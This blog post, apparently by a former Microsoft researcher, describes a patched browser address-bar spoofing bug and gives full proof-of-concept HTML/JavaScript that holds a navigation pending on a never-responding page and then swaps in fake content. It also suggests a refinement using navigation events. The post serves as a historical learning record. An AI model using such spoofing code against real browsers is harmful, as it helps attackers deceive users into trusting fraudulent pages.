Address Bar Spoof via Non-Responding URL

By navigating to a URL that never responds (a server-side Thread.Sleep), and then letting the user type a new address, the browser would update the address bar to show the new URL while keeping the original page’s content visible. The attacker’s page could then replace its own content to complete the spoof.

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>AddressBar_Spoof_non_response_URL</title>
</head>
<body>
<script language="JavaScript">
function main()
{
	location = "sleep.aspx";
	setTimeout("changeContent()", 5000);
}

function changeContent()
{
	document.body.innerHTML = '<h1>Content Spoofed!</h1> The URL of this page has been changed but the content has been spoofed!';
}

</script>
</body>
</html>

The technique relied on sleep.aspx — a page that simply delayed its response indefinitely — to hold open a pending navigation. While the browser was waiting for that response, the user could type a new URL in the address bar; the browser would show that URL but keep the pending page’s content. A timed setTimeout then swapped in convincing spoofed content. A more refined version would use document.execCommand("Stop") and navigation events to catch the exact moment the user committed a new URL.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [Browser Window Close via onbeforeunload Location Race] :: [DoS: createPopup screenLeft Null Pointer] >